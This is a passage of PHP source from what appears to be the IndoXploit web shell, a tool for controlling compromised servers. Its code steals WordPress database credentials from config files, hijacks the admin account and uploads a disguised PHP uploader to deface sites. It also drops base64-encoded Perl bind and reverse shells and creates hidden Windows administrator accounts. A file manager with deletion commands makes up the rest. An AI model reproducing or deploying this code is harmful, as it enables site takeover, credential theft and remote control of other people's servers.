curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true);$data = curl_exec($ch); curl_close($ch);return $data;}$scan = $_POST['link_config'];$link_config = scandir($scan);$script = htmlspecialchars($_POST['script']);$user = "indoxploit";$pass = "indoxploit";$passx = md5($pass);foreach($link_config as $dir_config) {if(!is_file("$scan/$dir_config")) continue;$config = file_get_contents("$scan/$dir_config");if(preg_match("/WordPress/", $config)) {$dbhost = ambilkata($config,"DB_HOST', '","'");$dbuser = ambilkata($config,"DB_USER', '","'");$dbpass = ambilkata($config,"DB_PASSWORD', '","'");$dbname = ambilkata($config,"DB_NAME', '","'");$dbprefix = ambilkata($config,"table_prefix = '","'");$prefix = $dbprefix."users";$option = $dbprefix."options";$conn = mysql_connect($dbhost,$dbuser,$dbpass);$db = mysql_select_db($dbname);$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");$result = mysql_fetch_array($q);$id = $result[ID];$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");$result2 = mysql_fetch_array($q2);$target = $result2[option_value];if($target == '') {echo "[-] error, gabisa ambil nama domain nya
";} else {echo "[+] $target
";}$update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");if(!$conn OR !$db OR !$update) {echo "[-] MySQL Error: ".mysql_error()."

";mysql_close($conn);} else {$site = "$target/wp-login.php";$site2 = "$target/wp-admin/theme-install.php?upload";$b1 = anucurl($site2);$wp_sub = ambilkata($b1, "id="wp-submit" class="button button-primary button-large" value="","" />");$b = lohgin($site, $site2, $user, $pass, $wp_sub);$anu2 = ambilkata($b,"name="_wpnonce" value="","" />");$upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");$www = "m.php";$fp5 = fopen($www,"w");fputs($fp5,$upload3);$post2 = array("_wpnonce" => "$anu2","_wp_http_referer" => "/wp-admin/theme-install.php?upload","themezip" => "@$www","install-theme-submit" => "Install Now",);$ch = curl_init("$target/wp-admin/update.php?action=upload-theme"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post2); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true);$data3 = curl_exec($ch); curl_close($ch);$y = date("Y");$m = date("m");$namafile = "id.php";$fpi = fopen($namafile,"w");fputs($fpi,$script);$ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www"); curl_setopt($ch6, CURLOPT_POST, true); curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile")); curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt"); curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch6, CURLOPT_COOKIESESSION, true);$postResult = curl_exec($ch6); curl_close($ch6);$as = "$target/k.php";$bs = anucurl($as);if(preg_match("#$script#is", $bs)) { echo "[+] berhasil mepes...
"; echo "[+] $as

"; } else { echo "[-] gagal mepes...
"; echo "[!!] coba aja manual:
"; echo "[+] $target/wp-login.php
"; echo "[+] username: $user
"; echo "[+] password: $pass

"; } mysql_close($conn);}}}} else {echo "

WordPress Auto Deface




NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
";}} elseif($_GET['do'] == 'auto_dwp2') {if($_POST['auto_deface_wp']) {function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION,true);$data = curl_exec($ch); curl_close($ch);return $data;}function lohgin($cek, $web, $userr, $pass, $wp_submit) { $post = array( "log" => "$userr", "pwd" => "$pass", "rememberme" => "forever", "wp-submit" => "$wp_submit", "redirect_to" => "$web", "testcookie" => "1", );$ch = curl_init($cek); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true);$data = curl_exec($ch); curl_close($ch);return $data;}$link = explode("rn", $_POST['link']);$script = htmlspecialchars($_POST['script']);$user = "indoxploit";$pass = "indoxploit";$passx = md5($pass);foreach($link as $dir_config) {$config = anucurl($dir_config);$dbhost = ambilkata($config,"DB_HOST', '","'");$dbuser = ambilkata($config,"DB_USER', '","'");$dbpass = ambilkata($config,"DB_PASSWORD', '","'");$dbname = ambilkata($config,"DB_NAME', '","'");$dbprefix = ambilkata($config,"table_prefix = '","'");$prefix = $dbprefix."users";$option = $dbprefix."options";$conn = mysql_connect($dbhost,$dbuser,$dbpass);$db = mysql_select_db($dbname);$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");$result = mysql_fetch_array($q);$id = $result[ID];$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");$result2 = mysql_fetch_array($q2);$target = $result2[option_value];if($target == '') {echo "[-] error, gabisa ambil nama domain nya
";} else {echo "[+] $target
";}$update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");if(!$conn OR !$db OR !$update) {echo "[-] MySQL Error: ".mysql_error()."

";mysql_close($conn);} else {$site = "$target/wp-login.php";$site2 = "$target/wp-admin/theme-install.php?upload";$b1 = anucurl($site2);$wp_sub = ambilkata($b1, "id="wp-submit" class="button button-primary button-large" value="","" />");$b = lohgin($site, $site2, $user, $pass, $wp_sub);$anu2 = ambilkata($b,"name="_wpnonce" value="","" />");$upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");$www = "m.php";$fp5 = fopen($www,"w");fputs($fp5,$upload3);$post2 = array("_wpnonce" => "$anu2","_wp_http_referer" => "/wp-admin/theme-install.php?upload","themezip" => "@$www","install-theme-submit" => "Install Now",);$ch = curl_init("$target/wp-admin/update.php?action=upload-theme"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post2); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true);$data3 = curl_exec($ch); curl_close($ch);$y = date("Y");$m = date("m");$namafile = "id.php";$fpi = fopen($namafile,"w");fputs($fpi,$script);$ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www"); curl_setopt($ch6, CURLOPT_POST, true); curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile")); curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt"); curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch6, CURLOPT_COOKIESESSION,true);$postResult = curl_exec($ch6); curl_close($ch6);$as = "$target/k.php";$bs = anucurl($as);if(preg_match("#$script#is", $bs)) { echo "[+] berhasil mepes...
"; echo "[+] $as

"; } else { echo "[-] gagal mepes...
"; echo "[!!] coba aja manual:
"; echo "[+] $target/wp-login.php
"; echo "[+] username: $user
"; echo "[+] password: $pass

"; } mysql_close($conn);}}} else {echo "

WordPress Auto Deface V.2

Link Config:


";}} elseif($_GET['do'] == 'network') {echo "
Bind Port:
PORT:
Back Connect:
Server:   PORT:
";$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";if(isset($_POST['sub_bp'])) {$f_bp = fopen("/tmp/bp.pl", "w");fwrite($f_bp, base64_decode($bind_port_p));fclose($f_bp);$port = $_POST['port_bind'];$out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");sleep(1);echo "
".$out."n".exe("ps aux | grep bp.pl")."
";unlink("/tmp/bp.pl");}$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";if(isset($_POST['sub_bc'])) {$f_bc = fopen("/tmp/bc.pl", "w");fwrite($f_bc, base64_decode($bind_connect_p));fclose($f_bc);$ipbc = $_POST['ip_bc'];$port = $_POST['port_bc'];$out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");sleep(1);echo "
".$out."n".exe("ps aux | grep bc.pl")."
";unlink("/tmp/bc.pl");}} elseif($_GET['do'] == 'krdp_shell') {if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {if($_POST['create']) {$user = htmlspecialchars($_POST['user']);$pass = htmlspecialchars($_POST['pass']);if(preg_match("/$user/", exe("net user"))) {echo "[INFO] -> user $user sudah ada";} else {$add_user = exe("net user $user $pass /add"); $add_groups1 = exe("net localgroup Administrators $user /add"); $add_groups2 = exe("net localgroup Administrator $user /add"); $add_groups3 = exe("net localgroup Administrateur $user /add"); echo "[ RDP ACCOUNT INFO ]
------------------------------
IP: ".$ip."
Username: $user
Password: $pass
------------------------------

[ STATUS ]
------------------------------
"; if($add_user) { echo "[add user] -> Berhasil
"; } else { echo "[add user] -> Gagal
"; } if($add_groups1) { echo "[add localgroup Administrators] -> Berhasil
"; } elseif($add_groups2) { echo "[add localgroup Administrator] -> Berhasil
"; } elseif($add_groups3) { echo "[add localgroup Administrateur] -> Berhasil
"; } else { echo "[add localgroup] -> Gagal
"; } echo "------------------------------
";}} elseif($_POST['s_opsi']) {$user = htmlspecialchars($_POST['r_user']);if($_POST['opsi'] == '1') {$cek = exe("net user $user");echo "Checking username $user ....... ";if(preg_match("/$user/", $cek)) {echo "[ Sudah ada ]
------------------------------

$cek
";} else {echo "[ belum ada ]";}} elseif($_POST['opsi'] == '2') {$cek = exe("net user $user indoxploit");if(preg_match("/$user/", exe("net user"))) {echo "[change password: indoxploit] -> ";if($cek) {echo "Berhasil";} else {echo "Gagal";}} else {echo "[INFO] -> user $user belum ada";}} elseif($_POST['opsi'] == '3') {$cek = exe("net user $user /DELETE");if(preg_match("/$user/", exe("net user"))) {echo "[remove user: $user] -> ";if($cek) {echo "Berhasil";} else {echo "Gagal";}} else {echo "[INFO] -> user $user belum ada";}} else {//}} else {echo "-- Create RDP --
-- Option --
";}} else {echo "Fitur ini hanya dapat digunakan dalam Windows Server.";}} elseif($_GET['act'] == 'newfile') {if($_POST['new_save_file']) {$newfile = htmlspecialchars($_POST['newfile']);$fopen = fopen($newfile, "a+");if($fopen) {$act = "";} else {$act = "permission denied";}}echo $act;echo "
Filename:
";} elseif($_GET['act'] == 'newfolder') {if($_POST['new_save_folder']) {$new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);if(!mkdir($new_folder)) {$act = "permission denied";} else {$act = "";}}echo $act;echo "
Folder Name:
";} elseif($_GET['act'] == 'rename_dir') {if($_POST['dir_rename']) {$dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");if($dir_rename) {$act = "";} else {$act = "permission denied";}echo "".$act."
";}echo "
";} elseif($_GET['act'] == 'delete_dir') {if(is_dir($dir)) {if(is_writable($dir)) {@rmdir($dir);@exe("rm -rf $dir");@exe("rmdir /s /q $dir");$act = "";} else {$act = "could not remove ".basename($dir)."";}}echo $act;} elseif($_GET['act'] == 'view') {echo "Filename: ".basename($_GET['file'])." [ view ] [ edit ] [ rename ] [ download ] [ delete ]
";echo "";} elseif($_GET['act'] == 'edit') {if($_POST['save']) {$save = file_put_contents($_GET['file'], $_POST['src']);if($save) {$act = "Saved!";} else {$act = "permission denied";}echo "".$act."
";}echo "Filename: ".basename($_GET['file'])." [ view ] [ edit ] [ rename ] [ download ] [ delete ]
";echo "

";} elseif($_GET['act'] == 'rename') {if($_POST['do_rename']) {$rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");if($rename) {$act = "";} else {$act = "permission denied";}echo "".$act."
";}echo "Filename: ".basename($_GET['file'])." [ view ] [ edit ] [ rename ] [ download ] [ delete ]
";echo "
";} elseif($_GET['act'] == 'delete') {$delete = unlink($_GET['file']);if($delete) {$act = "";} else {$act = "permission denied";}echo $act;} else {if(is_dir($dir) === true) {if(!is_readable($dir)) {echo "can't open directory. ( not readable )";} else {echo '';$scandir = scandir($dir);foreach($scandir as $dirx) {$dtype = filetype("$dir/$dirx");$dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));if(function_exists('posix_getpwuid')) {$downer = @posix_getpwuid(fileowner("$dir/$dirx"));$downer = $downer['name'];} else {//$downer = $uid;$downer = fileowner("$dir/$dirx");}if(function_exists('posix_getgrgid')) {$dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));$dgrp = $dgrp['name'];} else {$dgrp = filegroup("$dir/$dirx");} if(!is_dir("$dir/$dirx")) continue; if($dirx === '..') { $href = "$dirx"; } elseif($dirx === '.') { $href = "$dirx"; } else { $href = "$dirx"; } if($dirx === '.' || $dirx === '..') { $act_dir = "newfile | newfolder"; } else { $act_dir = "rename | delete"; } echo ""; echo "";echo "";echo "";echo "";echo "";echo "";echo "";echo "";}}} else {echo "can't open directory.";}foreach($scandir as $file) {$ftype = filetype("$dir/$file");$ftime = date("F d Y g:i:s", filemtime("$dir/$file"));$size = filesize("$dir/$file")/1024;$size = round($size,3);if(function_exists('posix_getpwuid')) {$fowner = @posix_getpwuid(fileowner("$dir/$file"));$fowner = $fowner['name'];} else {//$downer = $uid;$fowner = fileowner("$dir/$file");}if(function_exists('posix_getgrgid')) {$fgrp = @posix_getgrgid(filegroup("$dir/$file"));$fgrp = $fgrp['name'];} else {$fgrp = filegroup("$dir/$file");}if($size > 1024) {$size = round($size/1024,2). 'MB';} else {$size = $size. 'KB';}if(!is_file("$dir/$file")) continue;echo "";echo "";echo "";echo "";echo "";echo "";echo "";echo "";echo "";}echo "
Name
Type
Size
Last Modified
Owner/Group
Permission
Action
$href
$dtype
-
$dtime
$downer/$dgrp
".w("$dir/$dirx",perms("$dir/$dirx"))."
$act_dir
$file
$ftype
$size
$ftime
$fowner/$fgrp
".w("$dir/$file",perms("$dir/$file"))."
edit | rename | delete | download
";if(!is_readable($dir)) {//} else {echo "
";}echo "
Copyright © ".date("Y")." - IndoXploit
";}?>